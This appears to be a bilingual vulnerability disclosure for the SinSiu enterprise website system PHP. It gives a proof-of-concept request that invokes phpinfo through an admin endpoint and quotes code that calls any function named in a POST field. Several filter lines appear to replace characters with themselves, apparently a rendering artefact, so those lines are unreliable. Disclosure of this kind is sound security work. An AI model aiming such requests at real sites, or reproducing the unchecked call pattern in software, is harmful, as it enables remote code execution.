-
Notifications
You must be signed in to change notification settings - Fork 0
/
SinSiuEnterpriseWebsiteSystem
211 lines (174 loc) · 7 KB
/
SinSiuEnterpriseWebsiteSystem
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
中文:
新秀企业网站系统PHP版存在命令执行漏洞
厂商网站地址:http://www.sinsiu.com/
影响版本:
V1.0 下载地址:https://www.lanzoux.com/i8tj53e
V1.1 下载地址:http://www.sinsiu.com/
poc:
POST /sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/deal/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://localhost
Connection: close
Referer: http://localhost/sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/basic/index.html
Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2
cmd=phpinfo
detail:
负责过滤参数的函数中并没有处理phpinfo;
造成漏洞的函数:
V1.0
------------------------------------------
if(check_admin_login() > 0)
{
if(isset($global['dir']))
{
include('admin/module/'.$global['dir'].'/deal.php');
}
$cmd = post('cmd');
$cmd();
}
exit();
--------------------------------------------------
function strict($str)
{
if(S_MAGIC_QUOTES_GPC)
{
$str = stripslashes($str);
}
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('?','?',$str);
$str = str_replace('%','%',$str);
$str = str_replace(chr(39),''',$str);
$str = str_replace(chr(34),'"',$str);
$str = str_replace(chr(13).chr(10),'<br />',$str);
return $str;
}
V1.1
-------------------------------------------
if(file_exists($path))
{
include($path);
$cmd = post('cmd');
if(function_exists($cmd))
{
$cmd();
exit();
}
}
---------------------------------------------
function strict($str)
{
if(get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
$str = str_replace('&#','{^}',$str);
$str = str_replace('#','#',$str);
$str = str_replace('--','--',$str);
$str = str_replace('/*','/*',$str);
$str = str_replace('*/','*/',$str);
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('(','(',$str);
$str = str_replace(')',')',$str);
$str = str_replace("'",''',$str);
$str = str_replace('"','"',$str);
$str = str_replace('\\','\',$str);
$str = str_replace('%20',' ',$str);
$str = str_replace(chr(13).chr(10),'<br />',$str);
$str = str_replace('{^}','&#',$str);
return $str;
}
English:
There is a command execution vulnerability in the PHP version of the sinsiu enterprise website system
Manufacturer's website address: http://www.sinsiu.com/
Affected version:
V1.0 download address: https://www.lanzoux.com/i8tj53e
V1.1 download address: http://www.sinsiu.com/
poc:
POST /sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/deal/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://localhost
Connection: close
Referer: http://localhost/sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/basic/index.html
Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2
cmd=phpinfo
detail:
phpinfo() is not handled in the function responsible for filtering parameters;
Some functions that cause vulnerabilities:
V1.0
---------------------------------------------------------
if(check_admin_login() > 0)
{
if(isset($global['dir']))
{
include('admin/module/'.$global['dir'].'/deal.php');
}
$cmd = post('cmd');
$cmd();
}
exit();
----------------------------------------------------
function strict($str)
{
if(S_MAGIC_QUOTES_GPC)
{
$str = stripslashes($str);
}
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('?','?',$str);
$str = str_replace('%','%',$str);
$str = str_replace(chr(39),''',$str);
$str = str_replace(chr(34),'"',$str);
$str = str_replace(chr(13).chr(10),'<br />',$str);
return $str;
}
V1.1
----------------------------------------------------
if(file_exists($path))
{
include($path);
$cmd = post('cmd');
if(function_exists($cmd))
{
$cmd();
exit();
}
}
----------------------------------------------------------
function strict($str)
{
if(get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
$str = str_replace('&#','{^}',$str);
$str = str_replace('#','#',$str);
$str = str_replace('--','--',$str);
$str = str_replace('/*','/*',$str);
$str = str_replace('*/','*/',$str);
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('(','(',$str);
$str = str_replace(')',')',$str);
$str = str_replace("'",''',$str);
$str = str_replace('"','"',$str);
$str = str_replace('\\','\',$str);
$str = str_replace('%20',' ',$str);
$str = str_replace(chr(13).chr(10),'<br />',$str);
$str = str_replace('{^}','&#',$str);
return $str;
}